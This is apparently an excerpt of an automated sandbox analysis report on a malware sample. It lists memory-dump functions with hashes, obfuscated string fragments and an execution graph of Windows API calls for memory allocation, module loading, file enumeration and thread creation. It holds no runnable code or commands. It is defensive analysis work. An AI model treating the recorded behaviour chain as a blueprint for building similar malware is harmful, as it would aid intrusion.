                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                                                                                                                  • Instruction ID: adc6d6deace4977c9d7acebdcdf29881196c5c46300fa7192ea50a774187ce91
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                                                                                                                  • Instruction Fuzzy Hash: B101D2B6210208BFCB04DF99DC90EDB77ADAF8D710F008208BA09E7240D670F8518BA5
                                                                                                                                                                                  Function 032F338E Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dbe29211cc0df2f3072f4feff5ad7dc2bb906934deaebd492a8c312931c03d76
                                                                                                                                                                                  • Instruction ID: 46f858d7791a508eeb9bc3110bd3f25385c9d6b437594270e92f7c3e2093b1a3
                                                                                                                                                                                  • Opcode Fuzzy Hash: dbe29211cc0df2f3072f4feff5ad7dc2bb906934deaebd492a8c312931c03d76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A01E9B6C11218AFCB40DFE8D9419EEBBF9AB08604F14426EE915F7200F7709644CFA1
                                                                                                                                                                                  Function 032D1C62 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 825c3a144893f78cb0d85eda43f94a95d5bc3033ece40b3a8850a3f001e88041
                                                                                                                                                                                  • Instruction ID: 3fff54694306a734bbcebdfd3cad8d32492e90f1371d5a6f257cf397fc789c4c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 825c3a144893f78cb0d85eda43f94a95d5bc3033ece40b3a8850a3f001e88041
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F0B4776242566FD710DB6CAC81B9AF7DCEB84360F240222F91CDB641D6B1A8A18791
                                                                                                                                                                                  Function 032F6A7E Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b3049f5f7c78d29153654c9edb5171931b33f1631d64e060eef9dbdeb069383f
                                                                                                                                                                                  • Instruction ID: 2ca80d7fc210f1dcc500bcc83112eccef3848d84662cb296dcb3c5b32b2b4050
                                                                                                                                                                                  • Opcode Fuzzy Hash: b3049f5f7c78d29153654c9edb5171931b33f1631d64e060eef9dbdeb069383f
                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF01CB5210209BFD710DE99DC41EAB77ADEF89610F004519BE18A7241D670B9158BB1
                                                                                                                                                                                  Function 032F77EE Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                                                                                                                  • Instruction ID: 2b45cbbe2f1480cd3bd164fcde94c3a97f11914788c88977bd0c6ff1e3460748
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: CAE09AB62003487BCB10EE99DC41EEB77ADEFC9710F004429FA09AB241C7B0B8148BB5
                                                                                                                                                                                  Function 032E616E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                                                                                                                                  • Instruction ID: 8236f57aeab8d06af6218252fcd91f444b22dd375faeec2521e5e9ac29cabfc3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF08275C2520DEBDB14CFA4D841BDDFBB8EB04320F2087A9E8249B280D63497908781
                                                                                                                                                                                  Function 032F746E Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction ID: 01f4a10544ea433cd3eba097fdef08ef98d7665b40e703676e1859ebdcbdd347
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57E04F392203447BC620EA59CC00FA7B76DEFC5610F004519FA186B146D670790587A1
                                                                                                                                                                                  Function 032F952E Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f2d9fc78ce78c75d18c39c81bf92d3539ed2416e63415994ffda69807ee58002
                                                                                                                                                                                  • Instruction ID: ab40acf31ea159595f37d4e5e6fb70dae56831be731e7e3c93925027cb93d1fd
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d9fc78ce78c75d18c39c81bf92d3539ed2416e63415994ffda69807ee58002
                                                                                                                                                                                  • Instruction Fuzzy Hash: 69C012B66203086FEB00EB8CCC46F66339CAB08610F4444A4BA0D8F281E6B0B95086A6
                                                                                                                                                                                  Function 032D8E8F Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 66cd1caf48584c3e08016c493dcf73fa00be4e653f72ff23927643512ce34b91
                                                                                                                                                                                  • Instruction ID: d46be0d771e6b6f1923d6662fca2cc6d02e807ae601ee7551bc8d2e160483ba3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 66cd1caf48584c3e08016c493dcf73fa00be4e653f72ff23927643512ce34b91
                                                                                                                                                                                  • Instruction Fuzzy Hash: DFA0029912515D60981275D44F52C572C025547570AE44B502543BDA67EED949E814CB

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 032D867E Relevance: 38.9, Strings: 31, Instructions: 108COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: !$x$ Z$*S$/K$0$8$8O$8^$;$=$?Q$E $Ew$G,$Ij$Jp$MH$Q$V$VV$Xl$[$kt$m=$q:$t$~"$3$i$n
                                                                                                                                                                                  • API String ID: 0-1445620207
                                                                                                                                                                                  • Opcode ID: 0ffc5fcaf078c638a03d867d2db34aa4752dd32ad329c1c096755f08ffedf5d6
                                                                                                                                                                                  • Instruction ID: 09b9a04e24266a2e901ca7aa8dd0c5c6ca76a61f4009f17e0e78e44cf0d5a901
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ffc5fcaf078c638a03d867d2db34aa4752dd32ad329c1c096755f08ffedf5d6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A8128B0C05668CBEB60CF85D9587DEBAB4BB05309F5081D9C15D3B280C7BA1A89CF95
                                                                                                                                                                                  Function 032D191D Relevance: 35.0, Strings: 28, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$173*71/$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                                                                                                                                                  • API String ID: 0-2936358857
                                                                                                                                                                                  • Opcode ID: 88ae6bce5563d90fd96796731ba4aec3ab51f17061c92f2a1094de3dbb97cd85
                                                                                                                                                                                  • Instruction ID: a5a6dbe4ec9978f57537962109db4b9e92a2875813bbce73b02fc4cf4969903b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88ae6bce5563d90fd96796731ba4aec3ab51f17061c92f2a1094de3dbb97cd85
                                                                                                                                                                                  • Instruction Fuzzy Hash: A421CAF8C052889ACF24DF96EA82A9EFF70FB05740F209648D9156F240D7740A52CF96
                                                                                                                                                                                  Function 032DCCFE Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                                                  • API String ID: 0-685823316
                                                                                                                                                                                  • Opcode ID: c8fd1fb9a4e64db1564b5c3b5367ef21bcdaac9fabebe46c1b527480ccceb446
                                                                                                                                                                                  • Instruction ID: db7ff5b9eb9eac469130c2aa756174f3af2f3279e4ab29a2e2bdba918b6e6592
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8fd1fb9a4e64db1564b5c3b5367ef21bcdaac9fabebe46c1b527480ccceb446
                                                                                                                                                                                  • Instruction Fuzzy Hash: F82193B5D51318AAEF50DF94CC85BEEB7B9AF08700F10815CE608BA180DBB55648CBA4
                                                                                                                                                                                  Function 032D531E Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: "$,$B$C$F$g$s$~
                                                                                                                                                                                  • API String ID: 0-3965503115
                                                                                                                                                                                  • Opcode ID: b08c9357803aeb160324ae36289c9f7d68e31d4503c7c55c3673b77e22b8bff9
                                                                                                                                                                                  • Instruction ID: 1f7f7514bbc43915a15f3ee33a3b8d85c9daaad1a2d8f807a06bd226a3081c41
                                                                                                                                                                                  • Opcode Fuzzy Hash: b08c9357803aeb160324ae36289c9f7d68e31d4503c7c55c3673b77e22b8bff9
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC11ED10D0C2CED9DB02C7AC84187AEBFB15F22218F0881D9D5A42B282D2BA5759C7B6
                                                                                                                                                                                  Function 032E434E Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 1$6$7$K$s
                                                                                                                                                                                  • API String ID: 0-2374730789
                                                                                                                                                                                  • Opcode ID: 4624dbdbef5bdf89fa1280c96c48648d8880a3c6b4f9db0dd31904201765e4ae
                                                                                                                                                                                  • Instruction ID: 10e2366883ef58cf9d15e0d385e51193edec0c16536420b7b9bb4d03793de592
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4624dbdbef5bdf89fa1280c96c48648d8880a3c6b4f9db0dd31904201765e4ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: E33164B5E20219BFEB10DF94CD41BFEB7B8EF04304F008159E905AB240E7B59A958BE5

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:2.4%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                  Signature Coverage:1.6%
                                                                                                                                                                                  Total number of Nodes:445
                                                                                                                                                                                  Total number of Limit Nodes:72
                                                                                                                                                                                  execution_graph 99589 11b810 99592 13b6e0 99589->99592 99591 11ce81 99595 139820 99592->99595 99594 13b711 99594->99591 99596 1398b5 99595->99596 99598 13984b 99595->99598 99597 1398cb NtAllocateVirtualMemory 99596->99597 99597->99594 99598->99594 99599 12afd0 99604 12ace0 99599->99604 99601 12afdd 99618 12a960 99601->99618 99603 12aff9 99605 12ad05 99604->99605 99629 128620 99605->99629 99608 12ae53 99608->99601 99610 12ae6a 99610->99601 99611 12ae61 99611->99610 99613 12af57 99611->99613 99648 12a3b0 99611->99648 99614 12afba 99613->99614 99657 12a720 99613->99657 99661 13b770 99614->99661 99619 12a976 99618->99619 99622 12a981 99618->99622 99620 13b850 RtlAllocateHeap 99619->99620 99620->99622 99621 12a9a2 99621->99603 99622->99621 99623 128620 GetFileAttributesW 99622->99623 99624 12acb2 99622->99624 99627 12a3b0 RtlFreeHeap 99622->99627 99628 12a720 RtlFreeHeap 99622->99628 99623->99622 99625 12accb 99624->99625 99626 13b770 RtlFreeHeap 99624->99626 99625->99603 99626->99625 99627->99622 99628->99622 99630 12863d 99629->99630 99631 128644 GetFileAttributesW 99630->99631 99632 12864f 99630->99632 99631->99632 99632->99608 99633 133520 99632->99633 99634 13352e 99633->99634 99635 133535 99633->99635 99634->99611 99664 124820 99635->99664 99638 133579 99644 133724 99638->99644 99668 13b850 99638->99668 99641 133592 99642 13371a 99641->99642 99641->99644 99645 1335ae 99641->99645 99643 13b770 RtlFreeHeap 99642->99643 99642->99644 99643->99644 99644->99611 99645->99644 99646 13b770 RtlFreeHeap 99645->99646 99647 13370e 99646->99647 99647->99611 99649 12a3d6 99648->99649 99675 12ddb0 99649->99675 99651 12a448 99653 12a5d0 99651->99653 99655 12a466 99651->99655 99652 12a5b5 99652->99611 99653->99652 99654 12a270 RtlFreeHeap 99653->99654 99654->99653 99655->99652 99680 12a270 99655->99680 99658 12a746 99657->99658 99659 12ddb0 RtlFreeHeap 99658->99659 99660 12a7cd 99659->99660 99660->99613 99688 139a30 99661->99688 99663 12afc1 99663->99601 99665 124844 99664->99665 99666 124880 LdrLoadDll 99665->99666 99667 12484b 99665->99667 99666->99667 99667->99638 99671 132fe0 LdrLoadDll 99667->99671 99672 1399e0 99668->99672 99670 13b86b 99670->99641 99671->99638 99673 1399fd 99672->99673 99674 139a0e RtlAllocateHeap 99673->99674 99674->99670 99677 12ddd4 99675->99677 99676 12dde1 99676->99651 99677->99676 99678 13b770 RtlFreeHeap 99677->99678 99679 12de1e 99678->99679 99679->99651 99681 12a28d 99680->99681 99684 12de30 99681->99684 99683 12a393 99683->99655 99685 12de54 99684->99685 99686 13b770 RtlFreeHeap 99685->99686 99687 12defe 99685->99687 99686->99687 99687->99683 99689 139a4d 99688->99689 99690 139a5e RtlFreeHeap 99689->99690 99690->99663 99691 139610 99692 139687 99691->99692 99694 13963b 99691->99694 99693 13969d NtDeleteFile 99692->99693 99695 139510 99696 1395ba 99695->99696 99698 13953e 99695->99698 99697 1395d0 NtReadFile 99696->99697 99704 122a57 99707 126590 99704->99707 99706 122a80 99708 1265c3 99707->99708 99709 1265e7 99708->99709 99714 139200 99708->99714 99709->99706 99711 12660a 99711->99709 99718 1396b0 99711->99718 99713 12668c 99713->99706 99715 13921a 99714->99715 99721 b62ca0 LdrInitializeThunk 99715->99721 99716 139246 99716->99711 99719 1396ca 99718->99719 99720 1396db NtClose 99719->99720 99720->99713 99721->99716 99723 119e40 99724 119e4f 99723->99724 99725 119e8c 99724->99725 99726 119e79 CreateThread 99724->99726 99727 127400 99728 127414 99727->99728 99730 1396b0 NtClose 99728->99730 99732 12746f 99728->99732 99729 1275a7 99731 127437 99730->99731 99737 126820 NtClose LdrInitializeThunk LdrInitializeThunk 99731->99737 99732->99729 99738 126820 NtClose LdrInitializeThunk LdrInitializeThunk 99732->99738 99734 127581 99734->99729 99739 1269f0 NtClose LdrInitializeThunk LdrInitializeThunk 99734->99739 99737->99732 99738->99734 99739->99729 99740 125e80 99745 1283b0 99740->99745 99742 125eb0 99744 125edc 99742->99744 99749 128330 99742->99749 99746 1283c3 99745->99746 99756 138bc0 99746->99756 99748 1283ee 99748->99742 99750 128374 99749->99750 99755 128395 99750->99755 99762 138990 99750->99762 99752 128385 99753 1283a1 99752->99753 99754 1396b0 NtClose 99752->99754 99753->99742 99754->99755 99755->99742 99757 138bee 99756->99757 99758 138c41 99756->99758 99757->99748 99761 b62dd0 LdrInitializeThunk 99758->99761 99759 138c66 99759->99748 99761->99759 99763 138a10 99762->99763 99765 1389be 99762->99765 99767 b64650 LdrInitializeThunk 99763->99767 99764 138a35 99764->99752 99765->99752 99767->99764 99768 128ac7 99770 128a81 99768->99770 99769 128af1 99770->99768 99770->99769 99772 127380 99770->99772 99773 127396 99772->99773 99775 1273cf 99772->99775 99773->99775 99776 1271f0 LdrLoadDll 99773->99776 99775->99770 99776->99775 99779 129ecb 99781 129ed1 99779->99781 99780 129efd 99781->99780 99782 13b770 RtlFreeHeap 99781->99782 99782->99780 99783 138c70 99784 138c8d 99783->99784 99787 b62df0 LdrInitializeThunk 99784->99787 99785 138cb5 99787->99785 99788 136230 99789 13628a 99788->99789 99791 136297 99789->99791 99792 133c40 99789->99792 99793 13b6e0 NtAllocateVirtualMemory 99792->99793 99795 133c81 99793->99795 99794 133d8e 99794->99791 99795->99794 99796 124820 LdrLoadDll 99795->99796 99798 133cc7 99796->99798 99797 133d10 Sleep 99797->99798 99798->99794 99798->99797 99799 13c870 99800 13b770 RtlFreeHeap 99799->99800 99801 13c885 99800->99801 99807 131cf0 99808 131d09 99807->99808 99809 131d51 99808->99809 99812 131d94 99808->99812 99814 131d99 99808->99814 99810 13b770 RtlFreeHeap 99809->99810 99811 131d61 99810->99811 99813 13b770 RtlFreeHeap 99812->99813 99813->99814 99815 138af0 99816 138b82 99815->99816 99817 138b1e 99815->99817 99820 b62ee0 LdrInitializeThunk 99816->99820 99818 138bb3 99820->99818 99821 b62ad0 LdrInitializeThunk 99822 119ea0 99825 11a32a 99822->99825 99824 11a7c4 99825->99824 99826 13b3d0 99825->99826 99827 13b3f6 99826->99827 99832 114140 99827->99832 99829 13b402 99830 13b43b 99829->99830 99835 1357c0 99829->99835 99830->99824 99834 11414d 99832->99834 99839 1234e0 99832->99839 99834->99829 99836 135822 99835->99836 99838 13582f 99836->99838 99857 121ce0 99836->99857 99838->99830 99840 1234fd 99839->99840 99842 123516 99840->99842 99843 13a130 99840->99843 99842->99834 99845 13a14a 99843->99845 99844 13a179 99844->99842 99845->99844 99850 138cc0 99845->99850 99848 13b770 RtlFreeHeap 99849 13a1ef 99848->99849 99849->99842 99851 138cdd 99850->99851 99854 b62c0a 99851->99854 99852 138d09 99852->99848 99855 b62c1f LdrInitializeThunk 99854->99855 99856 b62c11 99854->99856 99855->99852 99856->99852 99858 121d1b 99857->99858 99873 128140 99858->99873 99860 121d23 99861 121ff6 99860->99861 99862 13b850 RtlAllocateHeap 99860->99862 99861->99838 99863 121d39 99862->99863 99864 13b850 RtlAllocateHeap 99863->99864 99865 121d4a 99864->99865 99866 13b850 RtlAllocateHeap 99865->99866 99867 121d5b 99866->99867 99872 121df2 99867->99872 99888 126cf0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99867->99888 99869 124820 LdrLoadDll 99870 121fa2 99869->99870 99884 138100 99870->99884 99872->99869 99874 12816c 99873->99874 99889 128030 99874->99889 99877 1281b1 99879 1281cd 99877->99879 99882 1396b0 NtClose 99877->99882 99878 128199 99880 1281a4 99878->99880 99881 1396b0 NtClose 99878->99881 99879->99860 99880->99860 99881->99880 99883 1281c3 99882->99883 99883->99860 99885 138162 99884->99885 99887 13816f 99885->99887 99900 122010 99885->99900 99887->99861 99888->99872 99890 12804a 99889->99890 99894 128126 99889->99894 99895 138d60 99890->99895 99893 1396b0 NtClose 99893->99894 99894->99877 99894->99878 99896 138d7d 99895->99896 99899 b635c0 LdrInitializeThunk 99896->99899 99897 12811a 99897->99893 99899->99897 99916 128410 99900->99916 99902 122563 99902->99887 99903 122030 99903->99902 99920 131330 99903->99920 99906 12223c 99928 13c940 99906->99928 99908 122088 99908->99902 99923 13c810 99908->99923 99909 1283b0 LdrInitializeThunk 99912 122298 99909->99912 99910 122251 99910->99912 99934 120b30 99910->99934 99912->99902 99912->99909 99914 120b30 LdrInitializeThunk 99912->99914 99913 1283b0 LdrInitializeThunk 99915 1223e9 99913->99915 99914->99912 99915->99912 99915->99913 99917 12841d 99916->99917 99918 128441 99917->99918 99919 12843a SetErrorMode 99917->99919 99918->99903 99919->99918 99921 13b6e0 NtAllocateVirtualMemory 99920->99921 99922 131351 99921->99922 99922->99908 99924 13c820 99923->99924 99925 13c826 99923->99925 99924->99906 99926 13b850 RtlAllocateHeap 99925->99926 99927 13c84c 99926->99927 99927->99906 99929 13c8b0 99928->99929 99930 13c90d 99929->99930 99931 13b850 RtlAllocateHeap 99929->99931 99930->99910 99932 13c8ea 99931->99932 99933 13b770 RtlFreeHeap 99932->99933 99933->99930 99937 139940 99934->99937 99938 13995a 99937->99938 99941 b62c70 LdrInitializeThunk 99938->99941 99939 120b52 99939->99915 99941->99939 99942 1233e3 99943 128030 2 API calls 99942->99943 99944 1233f3 99943->99944 99945 1396b0 NtClose 99944->99945 99946 12340f 99944->99946 99945->99946 99947 12fa60 99948 12fac4 99947->99948 99949 126590 2 API calls 99948->99949 99951 12fbf7 99949->99951 99950 12fbfe 99951->99950 99976 1266a0 99951->99976 99953 12fda3 99954 12fc7a 99954->99953 99955 12fdb2 99954->99955 99980 12f840 99954->99980 99956 1396b0 NtClose 99955->99956 99958 12fdbc 99956->99958 99959 12fcb6 99959->99955 99960 12fcc1 99959->99960 99961 13b850 RtlAllocateHeap 99960->99961 99962 12fcea 99961->99962 99963 12fcf3 99962->99963 99964 12fd09 99962->99964 99966 1396b0 NtClose 99963->99966 99989 12f730 CoInitialize 99964->99989 99968 12fcfd 99966->99968 99967 12fd17 99992 139160 99967->99992 99970 12fd92 99971 1396b0 NtClose 99970->99971 99972 12fd9c 99971->99972 99973 13b770 RtlFreeHeap 99972->99973 99973->99953 99974 12fd35 99974->99970 99975 139160 LdrInitializeThunk 99974->99975 99975->99974 99977 1266c5 99976->99977 99996 138fe0 99977->99996 99981 12f85c 99980->99981 99982 124820 LdrLoadDll 99981->99982 99984 12f87a 99982->99984 99983 12f883 99983->99959 99984->99983 99985 124820 LdrLoadDll 99984->99985 99986 12f94e 99985->99986 99987 124820 LdrLoadDll 99986->99987 99988 12f9a8 99986->99988 99987->99988 99988->99959 99991 12f795 99989->99991 99990 12f82b CoUninitialize 99990->99967 99991->99990 99993 13917a 99992->99993 100001 b62ba0 LdrInitializeThunk 99993->100001 99994 1391aa 99994->99974 99997 138ffa 99996->99997 100000 b62c60 LdrInitializeThunk 99997->100000 99998 126739 99998->99954 100000->99998 100001->99994 100002 127060 100003 12708a 100002->100003 100006 1281e0 100003->100006 100005 1270b4 100007 1281fd 100006->100007 100013 138db0 100007->100013 100009 12824d 100010 128254 100009->100010 100018 138e90 100009->100018 100010->100005 100012 12827d 100012->100005 100014 138e4e 100013->100014 100015 138dde 100013->100015 100023 b62f30 LdrInitializeThunk 100014->100023 100015->100009 100016 138e87 100016->100009 100019 138f41 100018->100019 100021 138ebf 100018->100021 100024 b62d10 LdrInitializeThunk 100019->100024 100020 138f86 100020->100012 100021->100012 100023->100016 100024->100020 100025 12c860 100027 12c889 100025->100027 100026 12c981 100027->100026 100028 12c927 FindFirstFileW 100027->100028 100028->100026 100031 12c942 100028->100031 100029 12c968 FindNextFileW 100030 12c97a FindClose 100029->100030 100029->100031 100030->100026 100031->100029 100032 1210a0 100033 1210b9 100032->100033 100034 124820 LdrLoadDll 100033->100034 100035 1210d7 100034->100035 100036 121123 100035->100036 100037 121110 PostThreadMessageW 100035->100037 100037->100036 100038 13b460 100039 13b46b 100038->100039 100040 13b48a 100039->100040 100042 135cb0 100039->100042 100043 135d11 100042->100043 100045 135d1e 100043->100045 100046 1225e0 100043->100046 100045->100040 100047 122584 100046->100047 100048 1225f8 100046->100048 100049 138cc0 LdrInitializeThunk 100047->100049 100050 1225b3 100049->100050 100053 139750 100050->100053 